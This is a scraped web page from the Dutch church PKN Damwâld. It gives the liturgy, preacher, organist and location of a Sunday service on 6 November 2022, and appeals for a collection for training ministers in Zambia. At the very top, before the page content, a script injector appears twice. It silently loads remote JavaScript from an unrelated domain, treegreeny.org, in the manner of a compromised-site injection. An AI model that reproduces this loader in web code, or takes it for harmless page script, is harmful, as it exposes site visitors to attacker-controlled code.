;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Kerkdienst zondag 6 november 2022 14:00 uur - PKN Damwâld
zondag 6 november 2022
14:00 uur

Kerkdienst zondag 6 november 2022 14:00 uur

Informatie

Voorganger:Ds. G. Timmer, Burdaard
Organist:Jelte Cuperus
LivestreamDienst terugkijken
Bekijk op Youtube
Liturgie
Lied voor de dienst Psalm 84: 1 en 2
Binnenkomst kerkenraad en voorganger
Intochtslied : Lied 280: 1, 2, 3 en 4
Stil gebed, bemoediging en groet
We zingen: Lied 280: 5, 6 en 7
Apostolische Geloofsbelijdenis
We zingen: Psalm 84: 3
Gebed
We lezen uit de Bijbel : Lukas 12: 49-53 en 2 Timotheüs 3: 1-15
We zingen: Lied 968: 1, 3 en 5
Verkondiging .
Muzikaal moment .
We zingen: Lied 743: 1, 2, 3 en 4
Dankgebed en voorbeden
Slotlied: Psalm 84: 6
Zegen
Collecte
Liturgie met de liedteksten is alleen beschikbaar met een Mijn Kerk account. Inloggen
Locatie: Bonifatiuskerk Foarwei 2, Damwâld
Collecte informatie
Uitganscollecte: Collecte Kerk in Actie Zambia

De laatste jaren groeien de kerken hard in Zambia. Ruim tachtig procent van de bevolking is christen. Met de groei van de kerken neemt de vraag naar goede predikanten toe, vooral op het platteland. Op de theologische universiteit krijgen de studenten niet alleen theologisch onderwijs. Maar omdat op het platteland van Zambia extreme armoede heerst, leren de predikanten ook hoe ze de gemeenteleden in de dorpen kunnen helpen en kunnen bijdragen aan de ontwikkeling van de dorpsgemeenschappen. Via Kerk in Actie collecteren we in onze kerk om goede predikanten op te leiden in Zambia. Naast Zambiaanse docenten geven ook twee Nederlandse docenten daar les: Thijs en Marike Blok. Een deel van de predikanten in opleiding zijn al voorganger. Ze verhuizen soms met hun hele gezin naar het universiteitsterrein. Voor 2.450 euro krijgt een theologiestudent in Zambia een jaar opleiding en huisvesting. Helpt u mee?

Klik hier voor meer informatie